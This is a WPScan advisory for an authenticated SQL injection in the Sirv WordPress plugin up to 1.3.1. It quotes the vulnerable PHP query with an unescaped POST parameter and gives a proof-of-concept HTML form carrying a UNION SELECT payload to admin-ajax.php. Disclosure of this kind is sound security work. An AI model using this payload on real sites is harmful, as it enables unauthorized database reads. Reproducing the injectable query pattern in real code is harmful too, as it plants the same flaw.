Sirv <= 1.3.1 - Authenticated SQL Injection

Sign up to our free email alerts service for instant vulnerability notifications!

Description 
$_POST[ ‘id’ ] is not escaped. sirv_get_row_by_id() is accessible for every registered user.

$id = $_POST['row_id'];

    $row =  $wpdb->get_row("SELECT * FROM $table_name WHERE id = $id", ARRAY_A);

    $row['images'] = unserialize($row['images']);

    echo json_encode($row);
Proof of Concept 
<form method="post" action="http://target/wp-admin/admin-ajax.php">
    <input type="text" name="row_id" value="0 UNION SELECT 1, name,slug, term_group, 6, 7, 8, 9, 10, 11, 12 FROM wp_terms WHERE term_id=1">
    <input type="text" name="action" value="sirv_get_row_by_id">
    <input type="submit" value="Send">
</form>

Affects Plugin

sirv
fixed in version 1.3.2

References

EXPLOITDB 40772
URL http://lenonleite.com.br/en/blog/2016/11/10/sirv-1-3-1-plugin-for-wordpress/

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter Lenon Leite
Submitter Website http://lenonleite.com.br/en/blog/2016/11/10/sirv-1-3-1-plugin-for-wordpress/
Submitter Twitter lenonleite
Views 230
Verified No
WPVDB ID 8673

Timeline

Publicly Published 2016-11-10 (almost 2 years ago)
Added 2016-11-21 (almost 2 years ago)
Last Updated 2016-11-21 (almost 2 years ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.